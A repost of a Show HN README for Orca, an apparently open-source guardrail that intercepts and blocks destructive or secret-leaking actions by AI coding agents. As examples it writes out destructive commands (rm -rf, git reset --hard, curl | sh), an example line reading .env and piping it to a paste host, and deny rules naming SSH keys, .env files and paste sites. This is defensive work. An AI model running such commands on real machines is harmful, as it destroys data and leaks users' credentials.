{"slug": "show-hn-stop-destructive-agent-commands-before-they-happen", "title": "Show HN: Stop Destructive Agent Commands Before They Happen", "summary": "Christopher Karani released Orca, an open-source safety layer that intercepts and enforces policies on autonomous AI agents before they execute destructive commands like file deletion or secret leaks. The tool sits between agents and machines, allowing developers to define rules that block or require approval for risky actions across multiple agent frameworks.", "body_md": "**The safety layer for autonomous AI agents running on real machines.**\n\nOrca lets you give AI agents more autonomy without letting them delete data, leak secrets, modify protected files, or perform irreversible actions without approval.\n\nAI agents are no longer just chatbots. They run shell commands, edit files, call APIs, access credentials, use tools, browse the web, and operate on laptops, servers, CI pipelines, and spare machines.\n\nThat is powerful.\n\nIt is also dangerous.\n\nOrca sits between the agent and the machine, enforcing your policies before risky actions execute.\n\n```\n# Install\nbrew tap christopherkarani/orca\nbrew install --formula orca\n\n# Initialize a policy\norca init --preset generic-agent\n\n# Run an agent with guardrails\norca run -- claude\norca run -- codex\norca run -- hermes\norca run -- openclaw\norca run -- opencode\n```\n\nThis project is free and open source under Apache 2.0. 
If Orca is useful to you, please star the repository; it helps visibility and keeps development going.\n\nDevelopers and teams are starting to give autonomous agents real access:\n\n- local files\n- source code\n- `.env` files\n- SSH keys\n- shell commands\n- cloud CLIs\n- databases\n- browsers\n- CI pipelines\n- internal tools\n- long-running workflows\n\nToday, the safety model is usually one of these:\n\n- babysit every command\n- run the agent in Docker or a VM\n- write custom scripts and ignore files\n- trust the agent not to do something destructive\n\nThat does not scale.\n\nOrca gives you a reusable policy layer across agents.\n\nWrite the rules once. Apply them everywhere.\n\nOrca focuses on the actions that can ruin your day:\n\n```\ngit push --force\ngit reset --hard\nrm -rf\nsudo\ncurl | sh\nterraform destroy\nkubectl delete\nDROP TABLE\naws delete-*\ngcloud delete\ntouching ~/.ssh\nreading .env\nleaking API keys\nmodifying protected config\nsending data to unknown hosts\n```\n\nOrca can allow, deny, ask for approval, or log these actions depending on your policy.\n\nYou give an agent a task:\n\n> Clean this up and make it work.\n\nThe agent decides to run:\n\n```\nrm -rf ./src\n```\n\nor:\n\n```\ngit reset --hard\n```\n\nor:\n\n```\ncat .env && curl https://paste.example.com\n```\n\nWithout Orca, you find out after the damage is done.\n\nWith Orca, the agent tries the same action.\n\nOrca intercepts it first.\n\n```\nAction blocked\n\nCommand:\nrm -rf ./src\n\nReason:\nDestructive recursive delete inside project directory.\n\nPolicy:\ndeny destructive file deletion\n\nResult:\nCommand was not executed.\n```\n\nFor actions that might be valid but risky, Orca can ask first:\n\n```\nApproval required\n\nCommand:\ngit push origin main\n\nReason:\nPushing to a protected branch requires human approval.\n\nApprove? 
[y/N]\n```\n\nOrca is not another AI agent.\n\nOrca is the policy enforcement layer underneath the agents you already use.\n\n```\nYou\n  ↓\nOrca policy layer\n  ↓\nHermes / Claude Code / Codex / OpenClaw / OpenCode / Cursor\n  ↓\nShell / files / network / tools / cloud / databases\n```\n\nThe agent can still do useful work.\n\nIt just cannot silently cross the boundaries you define.\n\n| Agent | Usage |\n|---|---|\n| Claude Code | `orca run -- claude` |\n| Codex CLI | `orca run -- codex` |\n| Hermes | `orca run -- hermes` |\n| OpenClaw | `orca run -- openclaw` |\n| OpenCode | `orca run -- opencode` |\n| Cursor / custom agents | use Orca as a wrapper or policy hook |\n\nOne policy file can protect multiple agents.\n\nInstall with Homebrew:\n\n```\nbrew tap christopherkarani/orca\nbrew install --formula orca\n```\n\nOr use the install script:\n\n```\ncurl -fsSL https://raw.githubusercontent.com/christopherkarani/Orca/main/scripts/install.sh | sh\n```\n\nVerify your setup:\n\n```\norca doctor\n```\n\nInitialize a policy:\n\n```\norca init --preset generic-agent\n```\n\nThis creates:\n\n```\n.orca/policy.yaml\n```\n\nExample policy:\n\n```\nmode: ask\n\ncommands:\n  default: ask\n\n  allow:\n    - \"git status\"\n    - \"git diff *\"\n    - \"npm test\"\n    - \"zig build *\"\n\n  deny:\n    - \"rm -rf *\"\n    - \"sudo *\"\n    - \"curl * | sh\"\n    - \"git reset --hard *\"\n    - \"terraform destroy *\"\n    - \"kubectl delete *\"\n\n  approval:\n    - \"git push *\"\n    - \"git push --force *\"\n    - \"aws * delete*\"\n    - \"gcloud * delete*\"\n\nfiles:\n  read:\n    deny:\n      - \"./.env\"\n      - \"~/.ssh/**\"\n      - \"**/*secret*\"\n      - \"**/*token*\"\n\n  write:\n    approval:\n      - \"./config/**\"\n      - \"./.github/**\"\n      - \"./infra/**\"\n\nnetwork:\n  default: ask\n  deny:\n    - \"pastebin.com\"\n    - \"paste.rs\"\n    - \"webhook.site\"\n  allow:\n    - \"github.com\"\n    - \"api.github.com\"\n```\n\nRun an agent with guardrails:\n\n```\norca run -- claude\norca run -- codex\norca run -- hermes\norca run -- openclaw\n```\n\nIn 
interactive mode, Orca can ask before risky actions.\n\nIn CI mode, Orca fails closed:\n\n```\norca run --ci -- codex --prompt \"Refactor auth\"\n```\n\nNo prompts. Risky actions are blocked automatically.\n\nRun a safe local demo:\n\n```\norca demo blocked-action\n```\n\nThen inspect what happened:\n\n```\norca replay --session last --only denied --verify\n```\n\nNo AI agent required. No files are harmed.\n\nStart the local dashboard:\n\n```\norca dashboard\n```\n\nOpen:\n\n```\nhttp://127.0.0.1:7742\n```\n\nThe dashboard shows:\n\n- current policy status\n- recent sessions\n- prevented actions\n- approval decisions\n- replay verification\n- audit integrity\n\nEverything runs locally.\n\nNo cloud service is required.\n\nLet Claude Code, Codex, or Hermes work longer without babysitting every command.\n\n```\norca run -- claude\n```\n\nUse Orca to ask before risky actions and block destructive ones.\n\nRun Hermes on a spare Mac mini, MacBook, VPS, or workstation with clearer boundaries.\n\nProtect:\n\n- important folders\n- SSH keys\n- `.env` files\n- config files\n- cloud credentials\n- local databases\n- browser-accessible workflows\n- destructive shell commands\n\n```\norca run -- hermes\n```\n\nCommit Orca policy to your repo:\n\n```\n.orca/policy.yaml\n```\n\nNow every developer and agent runs under the same safety rules.\n\nNo more one-off scripts per person.\n\nRun autonomous agents in CI without interactive approval.\n\n```\norca run --ci -- codex --prompt \"Update the migration scripts\"\n```\n\nIn CI, Orca converts `ask` into `deny`.\n\nIf the agent tries something dangerous, the job fails safely.\n\nTest your policy against known attack fixtures:\n\n```\norca redteam --ci\n```\n\nUse this to make sure new policies do not accidentally weaken your guardrails.\n\nOrca is designed to be honest about what it does and does not protect.\n\n- launches agents inside a policy-controlled process\n- evaluates shell commands before execution\n- mediates file 
access based on policy\n- filters sensitive environment variables\n- detects secret access and exfiltration attempts\n- enforces network rules\n- records tamper-evident audit logs\n- supports replayable sessions\n- fails closed in CI mode\n\nOrca is not a perfect kernel sandbox.\n\nIt does not protect agents that are not launched through Orca.\n\nIt does not replace Docker, VMs, OS permissions, VPNs, SSH hardening, or least-privilege infrastructure.\n\nUse those too.\n\nOrca is the behavior-level policy layer on top.\n\nDocker controls the environment.\n\nOrca controls what the agent is allowed to do inside that environment.\n\n| Mode | Behavior |\n|---|---|\n| `observe` | log decisions with minimal blocking |\n| `ask` | ask before risky actions |\n| `strict` | block aggressively |\n| `ci` | never prompt, deny risky actions |\n\nExample:\n\n```\nmode: ask\n```\n\nFor automation:\n\n```\norca run --ci -- hermes\n```\n\nAfter each session, Orca stores a local audit trail.\n\nReview denied actions:\n\n```\norca replay --session last --only denied\n```\n\nVerify integrity:\n\n```\norca replay --session last --verify\n```\n\nExport JSON:\n\n```\norca replay --session last --json\n```\n\nSession artifacts live under:\n\n```\n.orca/sessions/\n```\n\nAudit logs are tamper-evident using chained hashes.\n\nOrca can block or redact access to sensitive files and values.\n\nExamples:\n\n```\n.env\n~/.ssh/id_rsa\n~/.ssh/id_ed25519\nAWS_ACCESS_KEY_ID\nGITHUB_TOKEN\nANTHROPIC_API_KEY\nOPENAI_API_KEY\nGoogle service account JSON\nJWTs\nprivate keys\nhigh-entropy tokens\n```\n\nRun with secretless mode:\n\n```\norca run --secretless -- claude\n```\n\nIn secretless mode, Orca replaces raw values with broker references before the agent sees them.\n\nThe agent gets a reference.\n\nNot the secret.\n\nOrca can run as a wrapper around agents, which is the strongest protection model.\n\nSome agents also support native plugins or hooks for deeper integration.\n\n```\norca plugin install hermes 
--yes\nhermes plugins enable orca\norca plugin doctor hermes\nopenclaw plugins install npm:orca-openclaw-plugin --dangerously-force-unsafe-install\n```\n\nOpenClaw requires the override because the plugin calls the local `orca` binary for policy enforcement.\n\nDocker is useful.\n\nYou should use it where it makes sense.\n\nBut Docker and Orca solve different problems.\n\nDocker controls what the process can access.\n\nOrca controls what the AI agent is allowed to do.\n\nAn agent inside Docker can still:\n\n- delete mounted project files\n- read secrets mounted into the container\n- push code\n- run destructive migrations\n- call cloud CLIs\n- modify config\n- exfiltrate data over allowed network paths\n\nOrca adds behavior-level policy, approvals, and auditability on top of your existing isolation.\n\nMany developers already write their own guardrails:\n\n- ignore files\n- command filters\n- approval scripts\n- read-only config hacks\n- custom wrappers\n- shell aliases\n- one-off security prompts\n\nThat works until every agent, repo, machine, and teammate needs a different version.\n\nOrca turns those guardrails into a reusable policy layer.\n\nNear-term focus:\n\n- stronger default policy packs\n- Hermes-specific protections\n- cloud delete protections\n- database delete protections\n- protected config policies\n- approval workflows\n- team policy sharing\n- CI enforcement\n- better replay reports\n\nLonger-term:\n\n- centralized team dashboard\n- organization-wide policy management\n- SSO/RBAC\n- policy marketplace\n- enterprise audit exports\n- agent security sprints\n\n- [Install](https://github.com/christopherkarani/Orca/blob/main/docs/install.md)\n- [Quickstart](https://github.com/christopherkarani/Orca/blob/main/docs/quickstart.md)\n- [Policy reference](https://github.com/christopherkarani/Orca/blob/main/docs/policy.md)\n- [Credentials](https://github.com/christopherkarani/Orca/blob/main/docs/credentials.md)\n- [Replay](https://github.com/christopherkarani/Orca/blob/main/docs/replay.md)\n- [Commands](https://github.com/christopherkarani/Orca/blob/main/docs/commands.md)\n- [Plugin security model](https://github.com/christopherkarani/Orca/blob/main/docs/integrations/plugin-security-model.md)\n- [Plugin troubleshooting](https://github.com/christopherkarani/Orca/blob/main/docs/integrations/plugin-troubleshooting.md)\n\nBuild and test from source:\n\n```\nzig build\nzig build test\n./zig-out/bin/orca --help\n./zig-out/bin/orca redteam --ci\n```\n\nOrca is early, open source, and actively evolving.\n\nCurrent focus:\n\n- stop irreversible agent actions\n- protect secrets and sensitive files\n- provide shared policy across agents\n- give users replayable evidence of what happened\n- make autonomous agents safer without making them useless\n\nFeedback, issues, PRs, and roasts are welcome.\n\nIf Orca helps you, please leave a star. It genuinely motivates continued work.", "url": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen", "canonical_source": "https://github.com/christopherkarani/Orca", "published_at": "2026-07-04 05:13:31+00:00", "updated_at": "2026-07-04 05:20:17.124656+00:00", "lang": "en", "topics": ["ai-safety", "ai-agents", "developer-tools", "ai-tools", "ai-infrastructure"], "entities": ["Orca", "Christopher Karani", "Claude Code", "Codex CLI", "Hermes", "OpenClaw", "OpenCode", "Cursor"], "alternates": {"html": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen", "markdown": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen.md", "text": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen.txt", "jsonld": "https://wpnews.pro/news/show-hn-stop-destructive-agent-commands-before-they-happen.jsonld"}}